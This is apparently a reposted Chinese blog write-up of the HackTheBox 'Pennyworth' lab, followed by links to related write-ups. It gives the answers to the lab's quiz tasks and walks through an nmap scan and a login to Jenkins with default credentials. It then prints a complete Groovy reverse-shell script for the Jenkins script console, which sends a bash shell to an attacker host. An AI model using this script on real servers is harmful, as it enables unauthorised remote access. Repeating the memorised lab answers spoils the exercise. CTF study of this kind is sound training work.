HackTheBox-Starting Point--Tier 1---Pennyworth

这篇具有很好参考价值的文章主要介绍了HackTheBox-Starting Point--Tier 1---Pennyworth。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。


一 题目

Tags

Web、Common Applications、Jenkins、Java、Reconnaissance、Remote Code Execution、Default Credentials

译文:Web、常见应用、Jenkins、Java、侦察、远程代码执行、默认凭证

Connect

To attack the target machine, you must be on the same network.Connect to the Starting Point VPN using one of the following options.
It may take a minute for HTB to recognize your connection.If you don't see an update after 2-3 minutes, refresh the page.

译文:要攻击目标机器,您必须位于同一网络上。使用以下选项之一连接到起点 VPN。
HTB 可能需要一分钟才能识别您的连接。如果 2-3 分钟后没有看到更新,请刷新页面。

SPAWN MACHINE

Spawn the target machine and the IP will show here.

译文:生成目标机器,IP 将显示在此处

TASK 1

What does the acronym CVE stand for?

译文:CVE缩写代表什么?

答:Common Vulnerabilities and Exposures

TASK 2

What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

译文:CIA 中的三个字母,指的是 CIA 在网络安全方面的哪三个方面?

答:Confidentiality, Integrity, Availability

TASK 3

What is the version of the service running on port 8080?

译文:8080 端口上运行的服务版本是什么?

答:Jetty 9.4.39.v20210325

TASK 4

What version of Jenkins is running on the target?

译文:目标上运行的 Jenkins 版本是什么?

答:2.289.1

TASK 5

What type of script is accepted as input on the Jenkins Script Console?

译文:Jenkins 脚本控制台接受什么类型的脚本作为输入?

答:Groovy

TASK 6

What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

译文:如果目标 VM 运行 Windows,Groovy 脚本片段中的“String cmd”变量等于什么?

答:cmd.exe

TASK 7

What is a different command than "ip a" we could use to display our network interfaces' information on Linux?

译文:我们可以使用什么命令来显示 Linux 上的网络接口信息,而不是“ip a”?

答:ifconfig

TASK 8

What switch should we use with netcat for it to use UDP transport mode?

译文:我们应该对 netcat 使用什么开关才能使用 UDP 传输模式?

答:-u

TASK 9

What is the term used to describe making a target host initiate a connection back to the attacker host?

译文:用于描述使目标主机发起与攻击者主机的连接的术语是什么?

答:reverse shell

SUBMIT FLAG

Submit root flag

译文:提交根标志

二 实验过程

1.端口扫描

nmap -sC -sV 10.129.152.201

HackTheBox-Starting Point--Tier 1---Pennyworth,靶场集合,# HACK THE BOX,Hack The Box,jenkins,Groovy,Reverse Shell

2.访问8080端口

HackTheBox-Starting Point--Tier 1---Pennyworth,靶场集合,# HACK THE BOX,Hack The Box,jenkins,Groovy,Reverse Shell

3.登录口没有做任何防御,进行爆破

账号密码:root/password

4.访问 :8080/script,利用Groovy命令获取反弹shell

在Jenkins脚本控制台中,可以编写和运行Groovy脚本,尝试在Jenkins控制台插入反弹shell脚本。

# 在攻击机执行监听
ncat -nvlp 1234

访问target_ip:8080/script,在Jenkins控制台插入Groovy脚本,点击run运行

HackTheBox-Starting Point--Tier 1---Pennyworth,靶场集合,# HACK THE BOX,Hack The Box,jenkins,Groovy,Reverse Shell

String host="host_ip";
int port=监听端口;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

5.攻击者获取到shell

HackTheBox-Starting Point--Tier 1---Pennyworth,靶场集合,# HACK THE BOX,Hack The Box,jenkins,Groovy,Reverse Shell文章来源地址https://www.toymoban.com/news/detail-737742.html

到了这里,关于HackTheBox-Starting Point--Tier 1---Pennyworth的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • HackTheBox::Seal

    nmap -Pn -p- -T4 --min-rate=1000 10.10.10.250 nmap -Pn -p22,443,8080 -sCV 10.10.10.250 将seal.htb添加到hosts文件中。 查看443端口对应的界面,未发现可利用的点。 查看8080端口,是一个类似git仓库的登录界面。 尝试弱口令失败后,注册一个账号进行登录,注册处有一个上传图片的地方,尝试进行

    2024年02月06日
    浏览(49)
  • hackthebox --interface medium

    nmap -sV -sC -O -p22,80 10.10.11.200 -oN ports   访问80页面,主页面是这样的  再访问一下index.php或者index.html 发现是404错误, 有可能是里面隐藏了一些api我们可以查看到搜索看看有没有类似的api泄露 利用f12查看js源码 搜索http:// 或者/ 或者/upload 这里搜索到的是/api  说明这里是有可能跳

    2024年02月06日
    浏览(36)
  • HackTheBox 如何使用

    1.到官网注册一个账号 https://www.hackthebox.com/ 2.验证自己的邮箱 3.下载 openvpn 4.到左边的 labs 实验室开始学习或直接点击 start point 5.点击想要完成的靶机,比如第 0 层的第一个靶机,选择 connnect to htb 选择 openvpn 会自动下载 openvpn 的文件,然后用 openvpn 导入,稍等一下即可连接

    2024年02月06日
    浏览(37)
  • [渗透测试学习]Three - HackTheBox

    本靶机考察的是AWS服务 Task1 问题:打开了多少个TCP端口? nmap扫一下 Task2 问题: 网站“联系人”部分提供的电子邮

    2024年02月02日
    浏览(34)
  • [渗透测试学习] Hospital - HackTheBox

    nmap扫描一下端口 发现8080端口和443端口有http服务 然后发现3389端口是启用了ms-wbt-server服务 在对443端口的扫描没有收获,并且只有邮箱登录界面无法注册 接着看向8080端口,我们随便注册用户登录后发现有文件上传功能 经过测试pht和phar后缀都可以绕过检测,然后dirsearch扫描出

    2024年01月16日
    浏览(35)
  • [渗透测试学习] Crocodile - HackTheBox

    考察的是FTP传输协议相关知识 Task1 问题:在扫描过程中,什么NMAP扫描开关使用默认脚本? Task2 问题

    2024年02月02日
    浏览(29)
  • HackTheBox - Medium - Linux - Health

    Health 是一台中型 Linux 计算机,在主网页上存在 SSRF 漏洞,可利用该漏洞访问仅在 localhost 上可用的服务。更具体地说,Gogs 实例只能通过 localhost 访问,并且此特定版本容易受到 SQL 注入攻击。由于攻击者可以与 Gogs 实例交互的方式,在这种情况下,最好的方法是通过在本地计

    2024年01月18日
    浏览(52)
  • HackTheBox - Medium - Linux - Faculty

    Faculty 是一台中型 Linux 机器,具有 PHP Web 应用程序,该应用程序使用的库容易受到本地文件包含的影响。利用该库中的 LFi 会泄露一个密码,该密码可用于通过 SSH 以名为“gbyolo”的低级用户身份登录。用户“gbyolo”有权作为“developer”用户运行名为“meta-git”的“npm”包。此

    2024年01月22日
    浏览(37)
  • HackTheBox(HTB) Bagel WriteUp

    Writer: SomeB0dy Time:2023/2/20

    2024年02月10日
    浏览(50)
  • HackTheBox - Medium - Linux - BroScience

    BroScience 是一款中等难度的 Linux 机器,其特点是 Web 应用程序容易受到“LFI”的攻击。通过读取目标上的任意文件的能力,攻击者可以深入了解帐户激活码的生成方式,从而能够创建一组可能有效的令牌来激活新创建的帐户。登录后,进一步枚举显示该站点\\\'的主题选择器功能

    2024年02月03日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包